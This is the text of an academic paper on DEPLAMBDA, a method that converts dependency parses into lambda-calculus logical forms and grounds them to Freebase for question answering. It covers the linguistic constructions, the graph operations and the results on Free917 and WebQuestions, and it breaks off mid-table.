instruct robots (Chen and Mooney, 2011), extract information (Krishnamurthy and Mitchell, 2012), or describe vi- sual scenes (Matuszek et al., 2012). Current systems accomplish this by learning task-specific grammars (Berant et al., 2013), by using strongly-typed CCG grammars (Reddy et al., 2014), or by eschewing the use of a grammar entirely (Yih et al., 2015). aWork carried out during an internship at Google. b On leave from Columbia University. Disney acquired Pixar nnp vbd nnp nsubj dobjroot (a) The dependency tree for Disney acquired Pixar. (nsubj (dobj acquired Pixar) Disney) (b) The s-expression for the dependency tree. λx.∃yz. acquired(xe) ∧ Disney(ya) ∧ Pixar(za) ∧arg1(xe,ya) ∧ arg2(xe,za) (c) The composed lambda-calculus expression. Figure 1: The dependency tree is binarized into its s-expression, which is then composed into the lambda expression representing the sentence logical form. In recent years, there have been significant ad- vances in developing fast and accurate dependency parsers for many languages (McDonald et al., 2005; Nivre et al., 2007; Martins et al., 2013, inter alia). Motivated by the desire to carry these advances over to semantic parsing tasks, we present a robust method for mapping dependency trees to logical forms that represent underlying predicate-argument structures.1 We empirically validate the utility of these logical forms for question answering from databases. Since our approach uses dependency trees as input, we hy- pothesize that it will generalize better to domains that are well covered by dependency parsers than methods that induce semantic grammars from scratch. The system that maps a dependency tree to its log- ical form (henceforth DEPLAMBDA) is illustrated in Figure 1. First, the dependency tree is binarized via an obliqueness hierarchy to give an s-expression that describes the application of functions to pairs 1By “robust”, we refer to the ability to gracefully handle parse errors as well as the untyped nature of dependency syntax. 127 Transactions of the Association for Computational Linguistics, vol. 4, pp. 127–140, 2016. Action Editor: Christopher Potts. Submission batch: 12/2015; Published 4/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. mailto:siva.reddy@ed.ac.uk mailto:oscart@google.com mailto:mjcollins@google.com mailto:tomkwiat@google.com mailto:dipanjand@google.com mailto:steedman@inf.ed.ac.uk mailto:mlap@inf.ed.ac.uk of arguments. Each node in this s-expression is then substituted for a lambda-calculus expression and the relabeled s-expression is beta-reduced to give the log- ical form in Figure 1(c). Since dependency syntax does not have an associated type theory, we introduce a type system that assigns a single type to all con- stituents, thus avoiding the need for type checking (Section 2). DEPLAMBDA uses this system to gener- ate robust logical forms, even when the dependency structure does not mirror predicate-argument relation- ships in constructions such as conjunctions, prepo- sitional phrases, relative clauses, and wh-questions (Section 3). These ungrounded logical forms (Kwiatkowski et al., 2013; Reddy et al., 2014; Krishnamurthy and Mitchell, 2015) are used for question answer- ing against Freebase, by passing them as input to GRAPHPARSER (Reddy et al., 2014), a system that learns to map logical predicates to Freebase, result- ing in grounded Freebase queries (Section 4). We show that our approach achieves state-of-the-art per- formance on the Free917 dataset and competitive performance on the WebQuestions dataset, whereas building the Freebase queries directly from depen- dency trees gives significantly lower performance. Finally, we show that our approach outperforms a di- rectly comparable method that generates ungrounded logical forms using CCG. Details of our experimen- tal setup and results are presented in Section 5 and Section 6, respectively. 2 Logical Forms We use a version of the lambda calculus with three base types: individuals (Ind), events (Event), and truth values (Bool). Roughly speaking individuals are introduced by nouns, events are introduced by verbs, and whole sentences are functions onto truth values. For types A and B, we use A×B to denote the product type, while A → B denotes the type of functions mapping elements of A to elements of B. We will make extensive use of variables of type Ind × Event. For any variable x of type Ind × Event, we use x = (xa,xe) to denote the pair of variables xa (of type Ind) and xe (of type Event). Here, the subscript denotes the projections ·a : Ind× Event → Ind and ·e : Ind×Event → Event. An important constraint on the lambda calculus system is as follows: All natural language con- stituents have a lambda-calculus expression of type Ind×Event → Bool. A “constituent” in this definition is either a sin- gle word, or an s-expression. S-expressions are defined formally in the next section; examples are (dobj acquired Pixar) and (nsubj (dobj acquired Pixar) Disney). Essen- tially, s-expressions are binarized dependency trees, which include an ordering over the different dependencies to a head (in the above the dobj modifier is combined before the nsubj modifier). Some examples of lambda-calculus expressions for single words (lexical entries) are as follows: acquired ⇒ λx. acquired(xe) Disney ⇒ λy. Disney(ya) Pixar ⇒ λz. Pixar(za) An example for a full sentence is as follows: Disney acquired Pixar ⇒ λx.∃yz. acquired(xe) ∧ Disney(ya) ∧Pixar(za) ∧ arg1(xe,ya) ∧ arg2(xe,za) This is a neo-Davidsonian style of analysis. Verbs such as acquired make use of event variables such as xe, whereas nouns such as Disney make use of individual variables such as ya. The restriction that all expressions are of type Ind × Event → Bool simplifies the type system considerably. While it leads to difficulty with some linguistic constructions—see Section 3.3 for some examples—we believe the simplicity and robustness of the resulting system outweighs these concerns. It also leads to some spurious variables that are bound by lambdas or existentials, but which do not appear as arguments of any predicate: for example in the above analysis for Disney acquired Pixar, the variables xa, ye and ze are unused. However these “spurious” vari- ables are easily identified and discarded. An important motivation for having variables of type Ind×Event is that a single lexical item some- times makes use of both types of variables. For exam- ple, the noun phrase president in 2009 has semantics λx.∃y. president(xa) ∧ president event(xe)∧ arg1(xe,xa) ∧ 2009(ya) ∧ prep.in(xe,ya) In this example president introduces the predi- cates president, corresponding to an individual, and president event, corresponding to an event; essen- tially a presidency event that may have various prop- erties. This follows the structure of Freebase closely: 128 Freebase contains an individual corresponding to Barack Obama, with a president property, as well as an event corresponding to the Obama presidency, with various properties such as a start and end date, a location, and so on. The entry for president is then λx. president(xa) ∧ president event(xe) ∧ arg1(xe,xa) Note that proper nouns do not introduce an event predicate, as can be seen from the entries for Disney and Pixar above. 3 Dependency Structures to Logical Forms We now describe the system used to map dependency structures to logical forms. We first give an overview of the approach, then go into detail about various linguistic constructions. 3.1 An Overview of the Approach The transformation of a dependency tree to its logical form is accomplished through a series of three steps: binarization, substitution, and composition. Below, we outline these steps, with some additional remarks. Binarization. A dependency tree is mapped to an s-expression (borrowing terminology from Lisp). For example, Disney acquired Pixar has the s-expression (nsubj (dobj acquired Pixar) Disney) Formally, an s-expression has the form (exp1 exp2 exp3), where exp1 is a dependency label, and both exp2 and exp3 are either (1) a word such as acquired ; or (2) an s-expression such as (dobj acquired Pixar). We refer to the process of mapping a dependency tree to an s-expression as binarization, as it involves an ordering of modifiers to a particular head, similar to binarization of a context-free parse tree. Substitution. Each symbol (word or label) in the s-expression is assigned a lambda expression. In our running example we have the following assignments: acquired ⇒ λx. acquired(xe) Disney ⇒ λy. Disney(ya) Pixar ⇒ λz. Pixar(za) nsubj ⇒ λfgz.∃x.f(z) ∧g(x) ∧ arg1(ze,xa) dobj ⇒ λfgz.∃x.f(z) ∧g(x) ∧ arg2(ze,xa) Composition. Beta-reduction is used to compose the lambda-expression terms to compute the final semantics for the input sentence. In this step expres- sions of the form (exp1 exp2 exp3) are interpreted as function exp1 being applied to arguments exp2 and exp3. For example, (dobj acquired Pixar) re- ceives the following expression after composition: λz.∃x. acquired(ze) ∧ Pixar(xa) ∧ arg2(ze,xa) Obliqueness Hierarchy. The binarization stage re- quires a strict ordering on the different modifiers to each head in a dependency parse. For example, in (nsubj (dobj acquired Pixar) Disney), the dobj is attached before the nsubj. The ordering is very similar to the obliqueness hierarchy in syntactic for- malisms such as HPSG (Pollard and Sag, 1994). Type for Dependency Labels. Recall from Sec- tion 2 that every s-expression subtree receive a log- ical form of type η = Ind × Event → Bool. It follows that in any s-expression (exp1 exp2 exp3), exp1 has type η → (η → η), exp2 and exp3 both have type η, and the full expression has type η. Since each labeled dependency relation (e.g., nsubj, dobj, partmod) is associated with exp1 in connecting two s-expression subtrees, dependency labels always re- ceive expressions of type η → (η → η). Mirroring Dependency Structure. Whenever a dependency label receives an expression of the form λfgz.∃x.f(z) ∧g(x) ∧ rel(ze,xa) (1) where rel is a logical relation, the composition op- eration builds a structure that essentially mirrors the original dependency structure. For example nsubj and dobj receive expressions of this form, with rel = arg1 and rel = arg2, respectively; the final lambda expression for Disney acquired Pixar is λx.∃yz. acquired(xe) ∧ Disney(ya) ∧Pixar(za) ∧ arg1(xe,ya) ∧ arg2(xe,za) This structure is isomorphic to the original depen- dency structure: there are variables xe, ya and za corresponding to acquired, Disney and Pixar, respectively; and the sub-expressions arg1(xe,ya) and arg2(xe,za) correspond to the dependencies ac- quired → Disney and acquired → Pixar. By default we assume that the predicate argument structure is isomorphic to the dependency structure 129 and many dependency labels receive a semantics of the form shown in (1). However, there are a num- ber of important exceptions. As one example, the dependency label partmod receives semantics λfgz.∃x.f(z) ∧g(x) ∧ arg1(xe,za) with arg1(xe,za) in place of the arg1(ze,xa) in (1). This reverses the dependency direction to capture the predicate-argument structure of reduced relative constructions such as a company acquired by Disney. Post-processing. We apply three post-processing steps—simple inferences over lambda-calculus expressions—to the derived logical forms. These relate to the handling of prepositions, coordination and control and are described and motivated in more detail under the respective headings below. 3.2 Analysis of Some Linguistic Constructions In this section we describe in detail how various lin- guistic constructions not covered by the rule in (1)— prepositional phrases, conjunction, relative clauses, and Wh questions—are handled in the formalism.2 Prepositional Phrases. Prepositional phrase mod- ifiers to nouns and verbs have similar s-expressions: (prep president (pobj in 2009)) (prep acquired (pobj in 2009)) The following entries are used in these examples: in ⇒ λx. in(xe) prep ⇒ λfgz.∃x.f(z) ∧g(x) ∧ prep(ze,xa) pobj ⇒ λfgz.∃x.f(z) ∧g(x) ∧ pobj(ze,xa) president ⇒ λx. president(xa) ∧president event(xe) ∧ arg1(xe,xa) acquired ⇒ λx. acquired(xe) where the entries for prep and pobj simply mirror the original dependency structure with prep modifying the event variable ze. The semantics for acquired in 2009 is as follows: λx.∃py. acquired(xe) ∧ 2009(ya) ∧ in(pe) ∧ prep(xe,pe) ∧ pobj(pe,ya) 2The system contains 32 binarization rules (e.g., rules for obliqueness hierarchy and identifying traces) and 46 substi- tution rules (i.e., rules for dependency labels and parts of speech). The rules can be found at http://github.com/ sivareddyg/deplambda. We replace in(pe) ∧ prep(xe,pe) ∧ pobj(pe,ya) by prep.in(xe,ya) as a post-processing step, effectively collapsing out the p variable while replacing the prep and pobj dependencies by a single dependency, prep.in. The final semantics are then as follows: λx.∃y. acquired(xe) ∧ 2009(ya) ∧ prep.in(xe,ya) In practice this step is easily achieved by identifying variables (in this case pe) participating in prep and pobj relations. It would be tempting to achieve this step within the lambda calculus expressions them- selves, but we have found the post-processing step to be more robust to parsing errors and corner cases in the usage of the prep and pobj dependency labels. Conjunctions. First consider a simple case of NP- conjunction, Bill and Dave founded HP, whose s-expression is as follows: (nsubj (dobj founded HP) (conj-np (cc Bill and) Dave)) We make use of the following entries: conj-np ⇒ λfgx.∃yz.f(y) ∧g(z) ∧ coord(x,y,z) cc ⇒ λfgz.f(z) The sentence Bill and Dave founded HP then re- ceives the following semantics: λe.∃xyzu. Bill(ya) ∧ Dave(za) ∧ founded(ee) ∧ HP(ua) ∧coord(x,y,z) ∧ arg1(ee,xa) ∧ arg2(ee,ua) Note how the x variable occurs in two sub- expressions: coord(x,y,z), and arg1(ee,xa). It can be interpreted as a variable that conjoins variables y and z together. In particular, we introduce a post-processing step where the sub- expression coord(x,y,z) ∧ arg1(ee,xa) is replaced with arg1(ee,ya) ∧ arg1(ee,za), and the x variable is removed. The resulting expression is as follows: λe.∃yzu. Bill(ya) ∧ Dave(za) ∧ founded(ee) ∧ HP(ua) ∧arg1(ee,ya) ∧ arg1(ee,za) ∧ arg2(ee,ua) VP-coordination is treated in a very similar way. Consider the sentence Eminem signed to Interscope and discovered 50 Cent. This has the following s-expression: (nsubj (conj-vp (cc s-to-I and) d-50) Eminem) where s-to-I refers to the VP signed to Interscope, and d-50 refers to the VP discovered 50 Cent. The lambda-calculus expression for conj-vp is identical to the expression for conj-np: 130 http://github.com/sivareddyg/deplambda http://github.com/sivareddyg/deplambda conj-vp ⇒ λfgx.∃yz.f(y) ∧g(z) ∧ coord(x,y,z) The logical form for the full sentence is then λe.∃xyz. Eminem(xa) ∧ coord(e,y,z) ∧arg1(ee,xa) ∧ s to I(y) ∧ d 50(z) where we use s to I(y) and d 50(z) as shorthand for the lambda-calculus expressions for the two VPs. After post-processing this is simplified to λe.∃xyz. Eminem(xa) ∧ arg1(ye,xa) ∧arg1(ze,xa) ∧ s to I(y) ∧ d 50(z) Other types of coordination, such as sentence- level coordination and PP coordination, are handled with the same mechanism. All coordination depen- dency labels have the same semantics as conj-np and conj-vp. The only reason for having distinct de- pendency labels for different types of coordination is that different labels appear in different positions in the obliqueness hierarchy. This is important for getting the correct scope for different forms of con- junction. For instance, the following s-expression for the Eminem example would lead to an incorrect semantics: (conj-vp (nsubj (cc s-to-I and) Eminem) d-50) This s-expression is not possible under the oblique- ness hierarchy, which places nsubj modifiers to a verb after conj-vp modifiers. We realize that this treatment of conjunction is quite naive in comparison to that on offer in CCG. However, given the crude analysis of conjunction in dependency syntax, a more refined treatment is beyond the scope of the current approach. Relative Clauses. Our treatment of relative clauses is closely related to the mechanism for traces de- scribed by Moortgat (1988; 1991); see also Carpenter (1998) and Pereira (1990). Consider the NP Apple which Jobs founded with s-expression: (rcmod Apple (wh-dobj (BIND f (nsubj (dobj founded f) Jobs)) which)) Note that the s-expression has been augmented to include a variable f in dobj position, with (BIND f ...) binding this variable at the clause level. These annotations are added using a set of heuristic rules over the original dependency parse tree. The BIND operation is interpreted in the following way. If we have an expression of the form (BIND f λx.g(x)) where f is a variable and g is an expression that includes f, this is converted to λz.∃x.g(x) |f=EQ(z) where g(x) |f=EQ(z) is the expression g(x) with the expression EQ(z) substituted for f. EQ(z)(z′) is true iff z and z′ are equal (refer to the same entity). In addition we assume the following entries: wh-dobj ⇒ λfgz.f(z) rcmod ⇒ λfgz.f(z) ∧g(z) It can be verified that (BIND f (nsubj (dobj founded f) Jobs)) has semantics λu.∃xyz. founded(xe) ∧ Jobs(ya) ∧ EQ(u)(z) ∧arg1(xe,ya) ∧ arg2(xe,za) and Apple which Jobs founded has semantics λu.∃xyz. founded(xe) ∧ Jobs(ya) ∧ EQ(u)(z) ∧arg1(xe,ya) ∧ arg2(xe,za) ∧ Apple(ua) as intended. Note that this latter expression can be simplified, by elimination of the z variable, to λu.∃xy. founded(xe) ∧ Jobs(ya) ∧arg1(xe,ya) ∧ arg2(xe,ua) ∧ Apple(ua) Wh Questions. Wh questions are handled using the BIND-mechanism described in the previous sec- tion. As one example, the s-expression for Who did Jim marry is as follows: (wh-dobj (BIND f (nsubj (aux (dobj marry f) did) Jim)) who) We assume the following lambda expressions: Who ⇒ λx. TARGET(xa) did ⇒ λx. TRUE aux ⇒ λfg.f wh-dobj ⇒ λfgx.f(x) ∧g(x) It can be verified that this gives the final logical form λx.∃yz. TARGET(xa) ∧ marry(ye) ∧ Jim(za) ∧arg1(ye,za) ∧ arg2(ye,xa) Note that the predicate TARGET is applied to the variable that is the focus of the question. A similar treatment is used for cases with the wh-element in subject position (e.g., who married Jim ) or where the wh-element is extracted from a prepositional phrase (e.g., who was Jim married to ). 131 3.3 Comparison to CCG In this section we discuss some differences between our approach and CCG-based approaches for map- ping sentences to logical forms. Although our focus is on CCG, the arguments are similar for other for- malisms that use the lambda calculus in conjunction with a generative grammar, such as HPSG and LFG, or approaches based on context-free grammars. Our approach differs in two important (and re- lated) respects from CCG: (1) all constituents in our approach have the same semantic type (Ind × Event → Bool); (2) our formalism does not make the argument/adjunct distinction, instead essentially treating all modifiers to a given head as adjuncts. As an example, consider the analysis of Disney acquired Pixar within CCG. In this case acquired would be assigned the following CCG lexical entry: S\NP/NP ⇒ λf2f1x.∃yz. acquired(x) ∧f1(y) ∧f2(z) ∧arg1(x,y) ∧ arg2(x,z) Note the explicit arguments corresponding to the subject and object of this transitive verb (f1 and f2, respectively). An intransitive verb such as sleeps would be assigned an entry with a single functional argument corresponding to the subject (f1): S\NP ⇒ λf1x.∃y. sleeps(x) ∧f1(y) ∧ arg1(x,y) In contrast, the entries in our system for these two verbs are simply λx. acquired(xe) and λx. sleeps(xe). The two forms are similar, have the same semantic type, and do not include variables such as f1 and f2 for the subject and object. The advantage of our approach is that it is ro- bust, and relatively simple, in that a strict gram- mar that enforces type checking is not required. However, there are challenges in handling some lin- guistic constructions. A simple example is passive verbs. In our formalism, the passive form of ac- quired has the form λx. acquired.pass(xe), distinct from its active form λx. acquired(xe). The sen- tence Pixar was acquired is then assigned the log- ical form λx.∃y. acquired.pass(xe) ∧ Pixar(ya) ∧ arg1(xe,ya). Modifying our approach to give the same logical forms for active and passive forms would require a significant extension of our approach. In contrast, in CCG the lexical entry for the passive form of acquired can directly specify the mapping between subject position and the arg2: S\NP ⇒ λf2x.∃z. acquired(x) ∧f2(z) ∧ arg2(x,z) As another example, correct handling of object and subject control verbs is challenging in the single- type system: for example, in the analysis for John persuaded Jim to acquire Apple, the CCG analysis would have an entry for persuaded that explicitly takes three arguments (in this case John, Jim, and to acquire Apple ) and assigns Jim as both the direct object of persuaded and as the subject of acquire. In our approach the subject relationship to acquire is instead recovered in a post-processing step, based on the lexical identity of persuaded. 4 Semantic Parsing as Graph Matching We next describe how the ungrounded logical forms from the previous section are mapped to a fully grounded semantic representation that can be used for question answering against Freebase. Follow- ing Reddy et al. (2014), we treat this mapping as a graph matching problem, but instead of deriving un- grounded graphs from CCG-based logical forms, we use the dependency-based logical forms from the pre- vious sections. To learn the mapping to Freebase, we rely on manually assembled question-answer pairs. For each training question, we first find the set of oracle grounded graphs—Freebase subgraphs which when executed yield the correct answer—derivable from the question logical form. These oracle graphs are then used to train a structured perceptron model. 4.1 Ungrounded Graphs We follow Reddy et al. (2014) and first convert logi- cal forms to their corresponding ungrounded graphs. Figure 2(a) shows an example for What is the name of the company which Disney acquired in 2006?. Predi- cates corresponding to resolved entities (Disney(ya) and 2006(va)) become entity nodes (rectangles), whereas remaining entity predicates (name(wa) and company(xa)) become entity nodes (wa and xa), connected to entity type nodes (name and company; rounded rectangles). The TARGET(wa) node (dia- mond) connects to the entity node whose denotation corresponds to the answer to the question. 4.2 Grounded Graphs The ungrounded graphs are grounded to Freebase subgraphs by mapping entity nodes, entity-entity 132 name target company wa we xa ze Disney ze ze 2006 ac qu ire d. ar g1 ac qu ire d. ar g2 a c q u ire d .p re p .in a c q u ire d .a rg 2 acquired.arg 1 acquired.prep.in name.arg1 name.prep.of ty p e ty p e contract (a) Before CONTRACT. target organization. organization company name xa ze Disney ze ze 2006 ac qu ire d. ar g1 ac qu ire d. ar g2 bu sin es s. ac qu ist ion . ac qu iri ng co m pa ny bu sin ess .ac qu ist ion . co mp an y a cq uir ed a c q u ire d .p re p .in a c q u ire d .a rg 2 b u sin e ss. a c q u isitio n . d a te b u sin e ss. a c q u istio n . c o m p a n y a c q u ire d acquired.arg 1 acquired.prep.in business. acquistion. acquiring com pany business. acquisition. date type ty p e (b) After CONTRACT. Figure 2: The CONTRACT operation applied to the un- grounded graph for the question What is the name of the company which Disney acquired in 2006?. After CON- TRACT has been applied the graph is isomorphic to the representation in Freebase; in (b) we show the Freebase predicates after grounding in blue. edges and entity type nodes in the ungrounded graph to Freebase entities, relations and types, respec- tively. While Reddy et al. (2014) assume that the un- grounded graphs are isomorphic to their correspond- ing Freebase subgraph, at least 15% of the examples in our development set do not satisfy this property. For example, the ungrounded graph in Figure 2(a) is not isomorphic to the Freebase subgraph in Fig- ure 2(b), making it impossible to derive the correct grounded graph from the ungrounded one by a direct mapping. To account for such structural mismatch, we introduce two simple transformation operations. CONTRACT. The CONTRACT operation takes a pair of entity nodes connected by an edge and merges them into a single node. For example, in Figure 2(a) the entity nodes wa and xa are connected by an edge via the event we. After applying the CONTRACT op- eration to nodes wa and xa, they are merged. Note how in Figure 2(b) all the nodes attached to wa attach to the node xa after this operation. The contracted graph is now isomorphic to its Freebase subgraph. EXPAND. Parse errors may lead to ungrounded graphs with disconnected components. For example, the ungrammatical question What to do Washington DC December? results in the lambda expression λz.∃xyw. TARGET(xa) ∧ do(ze) ∧ arg1(ze,xa) ∧ Washington DC(ya) ∧ December(wa). The corre- sponding ungrounded graph has three disconnected components (December and Washington DC, and the component with entity node xa linked to event ze). In such cases, the graph is expanded by link- ing disconnected entity nodes to the event node with the largest edge degree. In the example above, this would add edges corresponding to the predicates dep(ze,ya) ∧ dep(ze,wa), where dep is the predi- cate introduced by the EXPAND operation when link- ing ya and wa to ze. When there is no existing event node in the graph, a dummy event node is introduced. 4.3 Learning We use a linear model to map ungrounded to grounded graphs. The parameters of the model are learned from question-answer pairs. For example, the question What is the name of the company which Disney acquired in 2006? is paired with its answer {Pixar}. In line with most work on question answer- ing against Freebase, we do not rely on annotated log- ical forms associated with the question for training, instead treating grounded graphs as latent variables. Let q be a question, let u be an ungrounded graph for q and let g be a grounded graph formed by ground- ing the nodes and edges of u to the knowledge base K (throughout we use Freebase as the knowledge base). Following Reddy et al. (2014), we use beam search to find the highest scoring pair of ungrounded and grounded graphs (û, ĝ) under the model θ ∈<n: (û, ĝ) = arg max (u,g) θ · Φ(u,g,q,K) , where Φ(u,g,q,K) ∈<n denotes the features for the pair of ungrounded and grounded graphs. Note that for a given query there may be multiple ungrounded graphs, primarily due to the optional use of the CON- TRACT operation.3 The feature function has access to the ungrounded and grounded graphs, to the question, as well as to the content of the knowledge base and the denotation |g|K (the denotation of a grounded graph is defined as the set of entities or attributes reachable at its TARGET node). See Section 5.3 for the features employed. The model parameters are estimated with the av- eraged structured perceptron (Collins, 2002; Fre- 3Another source of ambiguity may be a lexical item having multiple lambda-calculus entries; in our rules this only arises when analyzing count expressions such as how many. 133 und and Schapire, 1999). Given a training question- answer pair (q,A), the update is: θt+1 ← θt + Φ(u+,g+,q,K) − Φ(û, ĝ,q,K) , where (u+,g+) denotes the pair of gold ungrounded and grounded graphs for q. Since we do not have direct access to these gold graphs, we instead rely on the set of oracle graphs, OK,A(q), as a proxy: (u+,g+) = arg max (u,g)∈OK,A(q) θt · Φ(u,g,q,K) , where OK,A(q) is defined as the set of pairs (u, g) derivable from the question q, whose denotation |g|K has minimal F1-loss against the gold answer A. We find the oracle graphs for each question a priori by performing beam-search with a beam size of 10k and only use examples with oracle F1 > 0.0 for training. 5 Experimental Setup We next verify empirically that our proposed ap- proach derives a useful logical compositional seman- tic representation from dependency syntax. Below, we give details on the evaluation datasets and base- lines used for comparison. We also describe the model features and provide implementation details. 5.1 Training and Evaluation Datasets We evaluated our approach on the Free917 (Cai and Yates, 2013) and WebQuestions (Berant et al., 2013) datasets. Free917 consists of 917 questions manually annotated with their Freebase query. We retrieved the answer to each question by executing its query on Freebase and ignore the query for all subsequent ex- periments. WebQuestions consists of 5810 question- answer pairs. The standard train/test splits were used for both datasets, with Free917 containing 641 train and 276 test questions and WebQuestions contain- ing 3030 train and 2780 test questions. For all our development experiments we tuned the models on held-out data consisting of 30% of the training ques- tions, while for final testing we used the complete training data. 5.2 Baseline Models and Representations In addition to the dependency-based semantic rep- resentation DEPLAMBDA (Section 3) and previous work on these datasets, we compare to three addi- tional baseline representations outlined below. We use GRAPHPARSER4 to map these representations to Freebase. DEPTREE. In this baseline, an ungrounded graph is created directly from the original dependency tree. An event is created for each parent and its dependents in the tree. Each dependent is linked to this event with an edge labeled with its dependency relation, while the parent is linked to the event with an edge labeled arg0. If a word is a question word, an additional TARGET predicate is attached to its entity node. SIMPLEGRAPH. This representation has a single event to which all entities in the question are con- nected by the predicate arg1. An additional TARGET node is connected to the event by the predicate arg0. This is similar to the template representation of Yao (2015) and Bast and Haussmann (2015). Note that this cannot represent any compositional structure. CCGGRAPH. Finally, we compare to the CCG- based semantic representation of Reddy et al. (2014), adding the CONTRACT and EXPAND operations to increase its expressivity. 5.3 Implementation Details Below are more details of our entity resolution model, the syntactic parser used, features in the grounding model and the beam search procedure. Entity Resolution. For Free917, we follow prior work and resolve entities by string match against the entity lexicon provided with the dataset. For Web- Questions, we use eight handcrafted part-of-speech patterns to identify entity span candidates. We use the Stanford CoreNLP caseless tagger for part-of-speech tagging (Manning et al., 2014). For each candidate mention span, we retrieve the top 10 entities accord- ing to the Freebase API.5 We then create a lattice in which the nodes correspond to mention-entity pairs, scored by their Freebase API scores, and the edges encode the fact that no joint assignment of entities to mentions can contain overlapping spans. Finally, we generate ungrounded graphs for the top 10 paths through the lattice and treat the final entity disam- biguation as part of the semantic parsing problem. 4 http://github.com/sivareddyg/graph-parser 5 http://developers.google.com/freebase/ 134 http://github.com/sivareddyg/graph-parser http://developers.google.com/freebase/ Representation -C -E -C +E +C -E +C +E (a) Average oracle F1 DEPTREE 30.8 30.8 72.8 72.8 SIMPLEGRAPH 73.0 73.0 73.0 73.0 CCGGRAPH 65.1 70.3 67.6 72.9 DEPLAMBDA 64.8 66.3 71.8 73.0 (b) Average number of oracle graphs per question DEPTREE 1.5 1.5 354.6 354.6 SIMPLEGRAPH 1.5 1.5 1.8 1.8 CCGGRAPH 1.6 1.7 3.4 3.4 DEPLAMBDA 1.4 1.5 3.6 4.2 (c) Average F1 DEPTREE 19.9 19.9 42.6 42.6 SIMPLEGRAPH 49.0 49.0 48.2 48.2 CCGGRAPH 44.7 47.3 46.5 48.9 DEPLAMBDA 45.9 47.5 48.8 50.4 Table 1: Oracle statistics and accuracies on the Web- Questions development set. +(-)C: with(out) CONTRACT. +(-)E: with(out) EXPAND. Syntactic Parsing. We recase the resolved entity mentions and run a case-sensitive second-order con- ditional random field part-of-speech tagger (Laf- ferty et al., 2001). The hypergraph parser of Zhang and McDonald (2014) is used for dependency pars- ing. The tagger and parser are both trained on the OntoNotes 5.0 corpus (Weischedel et al., 2011), with constituency trees converted to Stanford-style depen- dencies (De Marneffe and Manning, 2008). To derive the CCG-based representation, we use the output of the EasyCCG parser (Lewis and Steedman, 2014). Features. We use the features from Reddy et al. (2014), which include edge alignment and stem over- lap between ungrounded and grounded graphs, and contextual features such as word and grounded rela- tion pairs. In addition, we introduce a feature indi- cating the use of the CONTRACT operation: (Merged- SubEdge, HeadSubEdge, MergedIsEntity, HeadIsEn- tity). For example, in Figure 2 the edge between wa and xa is contracted to xa, resulting in the feature (name.arg1, name.prep.of, False, False). The EX- PAND operation is treated as a pre-processing step and no features are used to encode its use. Finally, the entity-lattice score is used as a real valued feature. Beam Search. We use beam search to infer the highest scoring graph pair for a question. The search operates over entity-entity edges and entity type nodes of each ungrounded graph. For an entity-entity Representation -C -E -C +E +C -E +C +E (a) Oracle Accuracy DEPTREE 26.0 26.0 95.8 95.8 SIMPLEGRAPH 96.3 96.3 96.3 96.3 CCGGRAPH 91.2 93.3 92.2 95.3 DEPLAMBDA 91.1 92.7 94.3 95.8 (b) Average number of oracle graphs per question DEPTREE 1.2 1.2 285.4 285.4 SIMPLEGRAPH 1.6 1.6 1.8 1.8 CCGGRAPH 1.6 1.6 2.4 2.5 DEPLAMBDA 1.5 1.5 3.3 3.4 (c) Accuracy DEPTREE 21.3 21.3 51.6 51.6 SIMPLEGRAPH 40.9 40.9 42.0 42.0 CCGGRAPH 68.3 69.4 70.4 71.0 DEPLAMBDA 69.3 71.3 72.4 73.4 Table 2: Oracle statistics and accuracies on the Free917 development set. +(-)C: with(out) CONTRACT. +(-)E: with(out) EXPAND. edge, we can ground the edge to a Freebase relation, contract the edge in either direction, or skip the edge. For an entity type node, we can ground the node to a Freebase type, or skip the node. The order of traversal is based on the number of named entities connected to an edge. After an edge is grounded, the entity type nodes connected to it are grounded in turn, before the next edge is processed. To restrict the search, if two beam items correspond to the same grounded graph, the one with the lower score is discarded. A beam size of 100 was used in all experiments. 6 Experimental Results We examine the different representations for ques- tion answering along two axes. First, we compare their expressiveness in terms of answer reachability assuming a perfect model. Second, we compare their performance with a learned model. Finally, we con- duct a detailed error analysis of DEPLAMBDA, with a comparison to the errors made by CCGGRAPH. For WebQuestions evaluation is in terms of the av- erage F1-score across questions, while for Free917, evaluation is in terms of exact answer accuracy.6 6.1 Expressiveness of the Representations Table 1(a) and Table 2(a) show the oracle F1-scores of each representation on the WebQuestions and 6We use the evaluation scripts available at http:// www-nlp.stanford.edu/software/sempre and http:// github.com/elmar-haussmann/aqqu, respectively. 135 http://www-nlp.stanford.edu/software/sempre http://www-nlp.stanford.edu/software/sempre http://github.com/elmar-haussmann/aqqu http://github.com/elmar-haussmann/aqqu Free917 development sets respectively. According to the first column (-C -E), the original DEPTREE repre- sentation can be directly mapped to Freebase for less than a third of the questions. Adding the CONTRACT operation (+C) improves this substantially to an ora- cle F1 of about 73% on WebQuestions and 95.8% on Free917. However, this comes at the cost of massive spurious ambiguity: from Table 1(b) there are on av- erage over 300 oracle graphs for a single dependency tree. Table 1(c) shows the results of the different representations on the WebQuestions development set. Spurious ambiguity clearly hampers learning and DEPTREE falls behind the other representations. CCGGRAPH and DEPLAMBDA align much more closely to Freebase and achieve similar oracle F1 scores with far less spurious ambiguity. SIMPLE- GRAPH, which cannot represent any compositional semantics, is competitive with these syntax-based representations. This might come as a surprise, but it simply reflects the fact that the dataset does not con- tain questions that require compositional reasoning. 6.2 Results on WebQuestions and Free917 We use the best settings on the development set in subsequent experiments, i.e., with CONTRACT and EXPAND enabled. Table 3 shows the results on the WebQuestions and Free917 test sets with additional entries for recent prior work on these datasets. The trend from the development set carries over and DE- PLAMBDA outperforms the other graph-based repre- sentations, while performing slightly below the state- of-the-art model of Yih et al. (2015) (“Y&C”), which uses a separately trained entity resolution system (Yang and Chang, 2015). When using the standard Freebase API (“FB API”) for entity resolution, the performance of their model drops to 48.4% F1. On Free917, DEPLAMBDA outperforms all other representations by a wide margin and obtains the best result to date. Interestingly, DEPTREE outperforms SIMPLEGRAPH in this case. We attribute this to the small training set and larger lexical variation of Free917. The structural features of the graph-based representations seem highly beneficial in this case. 6.3 Error Analysis We categorized 100 errors made by DEPLAMBDA (+C +E) on the WebQuestions development set. In 43 cases the correct answer is present in the beam, Free917 WebQuestions Method Accuracy Average F1 Cai and Yates (2013) 59.0 – Berant et al. (2013) 62.0 35.7 Kwiatkowski et al. (2013) 68.0 – Yao and Van Durme (2014) – 33.0 Berant and Liang (2014) 68.5 39.9 Bao et al. (2014) – 37.5 Bordes et al. (2014) – 39.2 Yao (2015) – 44.3 Yih et al. (2015) (FB API) – 48.4 